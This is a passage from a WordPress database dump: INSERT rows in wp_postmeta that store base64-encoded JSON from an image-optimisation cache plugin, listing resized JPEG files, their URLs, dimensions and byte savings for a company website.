2XC8wOFwvc3ByYXktMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTA4NzcsImlkIjo2MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zcHJheS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NwcmF5LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc3ByYXktMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTA4NzksImlkIjo2MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zcHJheS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NwcmF5LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc3ByYXktMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTA4ODEsImlkIjo2MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zcHJheS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NwcmF5LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc3ByYXktMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTA4ODQsImlkIjo2MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zcHJheS01MTB4NDgxLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NDgxLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NwcmF5LTUxMHg0ODEuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc3ByYXktNTEweDQ4MS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTA4ODYsImlkIjo2MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NwcmF5LTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc3ByYXktMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zcHJheS0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDg4OCwiaWQiOjYwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc3ByYXktMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zcHJheS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NwcmF5LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwODkwLCJpZCI6NjB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zcHJheS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NwcmF5LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc3ByYXktMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTA4OTMsImlkIjo2MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NwcmF5LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc3ByYXktMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zcHJheS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDg5NSwiaWQiOjYwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc3ByYXktNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zcHJheS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NwcmF5LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwODk3LCJpZCI6NjB9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30387, 59, 'wpfc_optimisation_reduction', '53910'); 
INSERT INTO `wp_postmeta` VALUES (30388, 59, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc29sdmVudHMtMi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NvbHZlbnRzLTIuanBnIiwid2lkdGgiOjIyMCwiaGVpZ2h0IjoxNzksIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zb2x2ZW50cy0yLmpwZyIsInJlZHVjdGlvbiI6NTM5MDcsInRpbWUiOjE0ODM1OTA5MDQsImlkIjoiNTkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NvbHZlbnRzLTItMjAweDE3OS5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjE3OSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zb2x2ZW50cy0yLTIwMHgxNzkuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc29sdmVudHMtMi0yMDB4MTc5LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDkwNiwiaWQiOjU5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc29sdmVudHMtMi0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NvbHZlbnRzLTItMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zb2x2ZW50cy0yLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwOTA4LCJpZCI6NTl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zb2x2ZW50cy0yLTE4MHgxNzkuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc29sdmVudHMtMi0xODB4MTc5LmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTc5IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NvbHZlbnRzLTItMTgweDE3OS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTA5MTAsImlkIjo1OX1d'); 
INSERT INTO `wp_postmeta` VALUES (30389, 58, 'wpfc_optimisation_reduction', '22634'); 
INSERT INTO `wp_postmeta` VALUES (30390, 58, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX3YxLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX3YxLmpwZyIsIndpZHRoIjoxOTIwLCJoZWlnaHQiOjgwMCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NsaWRlMV92MS5qcGciLCJyZWR1Y3Rpb24iOjIyNjIwLCJ0aW1lIjoxNDgzNTkwOTE5LCJpZCI6IjU4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfdjEtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfdjEtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zbGlkZTFfdjEtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTA5MjEsImlkIjo1OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfdjEtODAweDMzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjMzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfdjEtODAweDMzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zbGlkZTFfdjEtODAweDMzMy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTA5MjQsImlkIjo1OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfdjEtNzY4eDMyMC5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjMyMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfdjEtNzY4eDMyMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zbGlkZTFfdjEtNzY4eDMyMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTA5MjcsImlkIjo1OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfdjEtMTYwMHg2NjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6NjY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMV92MS0xNjAweDY2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zbGlkZTFfdjEtMTYwMHg2NjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwOTMxLCJpZCI6NTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX3YxLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX3YxLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2xpZGUxX3YxLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwOTMzLCJpZCI6NTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX3YxLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX3YxLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2xpZGUxX3YxLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwOTM2LCJpZCI6NTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX3YxLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX3YxLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2xpZGUxX3YxLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwOTM4LCJpZCI6NTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX3YxLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX3YxLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2xpZGUxX3YxLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwOTQxLCJpZCI6NTh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfdjEtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfdjEtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zbGlkZTFfdjEtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTA5NDMsImlkIjo1OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMV92MS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMV92MS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NsaWRlMV92MS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDk0NSwiaWQiOjU4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX3YxLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX3YxLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2xpZGUxX3YxLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwOTQ4LCJpZCI6NTh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfdjEtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zbGlkZTFfdjEtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zbGlkZTFfdjEtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTA5NTAsImlkIjo1OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMV92MS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NsaWRlMV92MS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NsaWRlMV92MS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDk1MiwiaWQiOjU4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX3YxLTYwMHg2MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2xpZGUxX3YxLTYwMHg2MDAuanBnIiwid2lkdGgiOiI2MDAiLCJoZWlnaHQiOiI2MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2xpZGUxX3YxLTYwMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwOTU1LCJpZCI6NTh9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30391, 57, 'wpfc_optimisation_reduction', '390431'); 
